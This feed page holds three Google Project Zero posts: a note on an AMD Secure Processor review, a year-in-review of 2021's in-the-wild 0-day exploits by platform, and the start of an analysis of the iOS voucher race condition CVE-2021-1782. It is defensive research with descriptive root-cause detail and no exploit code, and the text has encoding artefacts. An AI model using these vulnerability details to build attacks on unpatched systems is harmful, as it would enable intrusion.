ūüĒí
‚ĚĆ
There are new articles available, click to refresh the page.
‚úáGoogle Project Zero

Release of Technical Report into the AMD Security Processor

By: Ryan ‚ÄĒ

Posted by James Forshaw, Google Project Zero

Today, members of Project Zero and the Google Cloud security team are releasing a technical report on a security review of AMD Secure Processor (ASP). The ASP is an isolated ARM processor in AMD EPYC CPUs that adds a root of trust and controls secure system initialization. As it's a generic processor AMD can add additional security features to the firmware, but like with all complex systems it's possible these features might have security issues which could compromise the security of everything under the ASP's management.

The security review undertaken was on the implementation of the ASP on the 3rd Gen AMD EPYC CPUs (codenamed "Milan"). One feature of the ASP of interest to Google is Secure Encrypted Virtualization (SEV). SEV adds encryption to the memory used by virtual machines running on the CPU. This feature is of importance to Confidential Computing as it provides protection of customer cloud data in use, not just at rest or when sending data across a network.

A particular emphasis of the review was on the Secure Nested Paging (SNP) extension to SEV added to "Milan". SNP aims to further improve the security of confidential computing by adding integrity protection and mitigations for numerous side-channel attacks. The review was undertaken with full cooperation with AMD. The team was granted access to source code for the ASP, and production samples to test hardware attacks.

The review discovered 19 issues which have been fixed by AMD in public security bulletins. These issues ranged from incorrect use of cryptography to memory corruption in the context of the ASP firmware. The report describes some of the more interesting issues that were uncovered during the review as well as providing a background on the ASP and the process the team took to find security issues. You can read more about the review on the Google Cloud security blog and the final report.

‚úáGoogle Project Zero

The More You Know, The More You Know You Don’t Know

By: Ryan ‚ÄĒ

A Year in Review of 0-days Used In-the-Wild in 2021

Posted by Maddie Stone, Google Project Zero

This is our third annual year in review of 0-days exploited in-the-wild [2020, 2019]. Each year we’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in the analysis of individual exploits, please check out our root cause analysis repository.

We perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard over and over and over about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans’ lives.

We’ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.

Executive Summary

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

With this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn‚Äôt actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero‚Äôs mission is ‚Äúmake 0day hard‚ÄĚ.¬†0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.

So while we recognize the industry‚Äôs improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there‚Äôs a lot more improving to be done.¬†Having access to more ‚Äúground truth‚ÄĚ of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.

We had so many more data points in 2021 to learn about attacker behavior than we’ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they’re using or what percentage of 0-days we’re missing in our tracking, so we’ll never know exactly what proportion of 0-days are currently being found and disclosed publicly.

Based on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:

  1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.
  2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.

A Record Year for In-the-Wild 0-days

2021 was a record year for in-the-wild 0-days. So what happened?

bar graph showing the number of in-the-wild 0-day detected per year from 2015-2021. The totals are taken from this tracking spreadsheet: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.

While we often talk about ‚Äú0-day exploits used in-the-wild‚ÄĚ, what we‚Äôre actually tracking are ‚Äú0-day exploits detected and disclosed¬†as used in-the-wild‚ÄĚ.¬†There are more factors than just the use¬†that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry.

Overall, we can break down the uptick in the number of in-the-wild 0-days into:

  • More detection of in-the-wild 0-day exploits
  • More public disclosure of in-the-wild 0-day exploitation

More detection

In the 2019 Year in Review, we wrote about the ‚ÄúDetection Deficit‚ÄĚ. We stated ‚ÄúAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can‚Äôt draw significant conclusions due to the lack of (and biases in) the data we have collected.‚ÄĚ In the last two years, we believe that there‚Äôs been progress on this gap.

Anecdotally, we hear from more people that they’ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we’re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.

A bar graph showing the number of distinct reporters of 0-day in-the-wild vulnerabilities per year for 2019-2021. 2019: 9, 2020: 10, 2021: 20. The data is taken from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

a line graph showing how many in-the-wild 0-days were found by their own vendor per year from 2015 to 2021. 2015: 0, 2016: 0, 2017: 2, 2018: 0, 2019: 4, 2020: 5, 2021: 17. Data comes from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

We’ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it’s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!

More disclosure

The second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate¬†‚ÄúGoogle Android‚ÄĚ rather than just ‚ÄúGoogle‚ÄĚ because Google Chrome has been annotating their security bulletins for the last few years)¬†first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don‚Äôt annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by ‚ÄúAnonymous‚ÄĚ reporters. If the reporters didn‚Äôt want credit for the vulnerability, it‚Äôs unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn‚Äôt have been included in this year‚Äôs list if Apple and Google Android had not begun transparently annotating their security advisories.

bar graph that shows the number of Android and Apple (WebKit + iOS + macOS) in-the-wild 0-days per year. The bar graph is split into two color: yellow for Anonymously reported 0-days and green for non-anonymous reported 0-days. 2021 is the only year with any anonymously reported 0-days. 2015: 0, 2016: 3, 2018: 2, 2019: 1, 2020: 3, 2021: Non-Anonymous: 8, Anonymous- 12. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

Kudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for CVE-2021-41773 this past year.

In-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor’s own security advisories.

It's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we’re confident that all vendors are transparently disclosing in-the-wild status, there’s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.

New Year, Old Techniques

We had a record number of ‚Äúdata points‚ÄĚ in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced¬†attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit ‚Äúshapes‚ÄĚ previously seen in public research. Once ‚Äú0-day is hard‚ÄĚ, we‚Äôd expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the¬†data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty ‚Äúmeh‚ÄĚ or standard.

Out of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it’s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:

  • 17 use-after-free
  • 6 out-of-bounds read & write
  • 4 buffer overflow
  • 4 integer overflow

In the next sections we’ll dive into each major platform that we saw in-the-wild 0-days for this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. CVE-2021-21166 is an issue in ScriptProcessorNode::Process() in webaudio where there’s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. CVE-2019-13720 is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.

CVE-2021-30632 is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the  TurboFan JIT in Chromium’s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. CVE-2021-30632 in particular deals with code that stores global properties. CVE-2020-16009 was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.

WebKit (Safari)

Prior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don’t have historical samples to go off of. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there’s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, CVE-2021-21166, also existed in WebKit and was fixed as CVE-2021-1844, though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, CVE-2021-30858, was very, very similar to a bug fixed in Chromium in January 2020.

Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked even though Internet Explorer’s market share of web browser users continues to decrease.

Bar graph showing the number of Internet Explorer itw 0-days discovered per year from 2015-2021. 2015: 3, 2016: 4, 2017: 3, 2018: 1, 2019: 3, 2020: 2, 2021: 4. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

So why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

For CVE-2021-26411 targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. CVE-2021-33742 and CVE-2021-40444 were delivered to targets via malicious Office documents.

CVE-2021-26411 and CVE-2021-33742 were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.

There were a few different vulnerabilities used in the exploit chain that used CVE-2021-40444, but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

The number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.

Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. CVE-2021-1732 is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, CVE-2022-21882, is due to CVE-2021-1732 actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. CVE-2021-40449 is a use-after-free in NtGdiResetDC due to the object being freed during the user callback.

iOS/macOS

As discussed in the ‚ÄúMore disclosure‚ÄĚ section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day (CVE-2021-30869) was also found. In this section we‚Äôre going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).

Bar graph showing the number of macOS and iOS itw 0-days discovered per year. macOs is 0 for every year except 2021 when 1 was discovered. iOS - 2015: 0, 2016: 2, 2017: 0, 2018: 2, 2019: 0, 2020: 3, 2021: 5. Data from: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=2129022708

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

These 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used CVE-2016-4654, a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP.  It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. CVE-2021-30807 is an out-of-bounds read and CVE-2021-30883 is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, CVE-2022-22587.

One iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU’s inter-process communication (IPC) functionality. CVE-2021-1782 exploited a vulnerability in mach vouchers while CVE-2021-30869 exploited a vulnerability in mach messages. This is not the first time we’ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. CVE-2019-6625 was exploited as a part of an exploit chain targeting iOS 11.4.1-12.1.2 and was also a vulnerability in mach vouchers.

Mach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: CVE-2020-27932 & CVE-2020-27950. This year’s CVE-2021-30869 is a pretty close variant to 2020’s CVE-2020-27932. Tielei Wang and Xinru Chi actually presented on this vulnerability at zer0con 2021 in April 2021. In their presentation, they explained that they found it while doing variant analysis on CVE-2020-27932. TieLei Wang explained via Twitter that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.

The two FORCEDENTRY exploits (CVE-2021-30860¬†and the sandbox escape) were the only times that made us all go ‚Äúwow!‚ÄĚ this year. For CVE-2021-30860, the integer overflow in CoreGraphics, it was because:

  1. For years we’ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and
  2. The exploit was an impressive work of art.

The sandbox escape (CVE requested, not yet assigned) was impressive because it’s one of the few times we’ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs.

For CVE-2021-30860, the vulnerability itself wasn‚Äôt especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Gro√ü & Ian Beer as ‚Äúone of the most technically sophisticated exploits [they]‚Äôve ever seen‚ÄĚ. Their blogpost shares all the details, but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:

        

Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

This is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.

Android

There were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: CVE-2019-2215. Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we’ll compare it to public security research.

For the 7 Android 0-days they targeted the following components:

5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against ‚ÄúAndroid devices‚ÄĚ, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU.

Public security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, Guang Gong, Man Yue Mo, and Ben Hawkes all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver.

The two non-GPU driver 0-days (CVE-2021-0920 and CVE-2021-1048) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it’s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.

The vulnerability now referred to as CVE-2021-0920 was actually found in September 2016 and discussed on the Linux kernel mailing lists. A patch was even developed back in 2016, but it didn’t end up being submitted. The bug was finally fixed in the Linux kernel in July 2021 after the detection of the in-the-wild exploit targeting Android. The patch then made it into the Android security bulletin in November 2021.

CVE-2021-1048 remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.

Microsoft Exchange Server

In 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065)  were all disclosed and patched at the same time and used together in a single operation. The fifth (CVE-2021-42321) was patched on its own in November 2021. CVE-2021-42321 was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with CVE-2021-42321, the attackers would have required at least another 0-day for successful exploitation since CVE-2021-42321 is a post-authentication bug.

Of the four Exchange in-the-wild 0-days used in the first campaign, CVE-2021-26855, which is also known as ‚ÄúProxyLogon‚ÄĚ, is the only one that‚Äôs pre-auth. CVE-2021-26855¬†is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, CVE-2021-26858¬†and CVE-2021-27065¬†allowed attackers to write arbitrary files to the system. CVE-2021-26857¬†is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.

For the second campaign, CVE-2021-42321, like CVE-2021-26858, is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.

While there were a significant amount of 0-days in Exchange detected and disclosed in 2021, it’s important to remember that they were all used as 0-day in only two different campaigns. This is an example of why we don’t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.

While this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was n-day exploitation of Exchange Servers. Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we’ll likely see it continue into 2022.

Outstanding Questions

While there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we’re missing and why, and the need for more transparency from both vendors and researchers.

Until the day that attackers decide to happily share all their exploits with us, we can’t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we’re very likely missing. From that, these are some of the key questions we’re asking ourselves as we move into 2022:

Where are the [x] 0-days?

Despite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers and yet there’s only 1 messaging app, in this case iMessage, 0-day found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.

Along with messaging apps, there are other platforms/targets we’d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there’s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.

This leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?

Do some vendors have no known in-the-wild 0-days because they’ve never been found or because they don’t publicly disclose?

Unless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don’t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.

Are we seeing the same bug patterns because that’s what we know how to detect?

As we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that’s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that’s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we’d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers.

Where are the spl0itz?

To successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful).

Unfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.

As an aside, if you have an exploit sample that you’re willing to share with us, please reach out. Whether it’s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we’d be happy to work with you.

Conclusion

Looking back on 2021, what comes to mind is ‚Äúbaby steps‚ÄĚ. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we‚Äôre not making 0-day hard. Attackers are having success using vulnerabilities similar to what we‚Äôve seen previously and in components that have previously been discussed as attack surfaces.The goal is to force attackers to start from scratch each time we detect one of their exploits: they‚Äôre forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. ¬†And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.

While this all may seem daunting, the promising part is that we’ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. So while there is still plenty more work to do, it’s a tractable problem. There are concrete steps that the tech and security industries can take to make it even more progress:

  1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,
  2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.
  3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.

Through 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted over and over how governments were using commercial surveillance products against journalists, human rights defenders, and government officials. We saw many enterprises scrambling to remediate and protect themselves from the Exchange Server 0-days. And we even learned of peer security researchers being targeted by North Korean government hackers. While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.

2021 showed us we’re on the right track and making progress, but there’s plenty more to be done to make 0-day hard.

‚úáGoogle Project Zero

CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers

By: Ryan ‚ÄĒ

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the writeup published last week looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem works and its quirks which lead to this vulnerability.

CVE-2021-1782 was fixed in iOS 14.4, as noted by @s1guza on twitter:

"So iOS 14.4 added locks around this code bit (user_data_get_value() in ipc_voucher.c). "e_made" seems to function as a refcount, and you should be able to race this with itself and cause some refs to get lost, eventually giving you a double free"

This vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:

Kernel. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: A Malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited. Description: A race condition was addressed with improved locking. CVE-2021-1772: an anonymous researcher. Entry updated May 28, 2021

Vouchers

What exactly is a voucher?

The kernel code has a concise description:

Vouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).

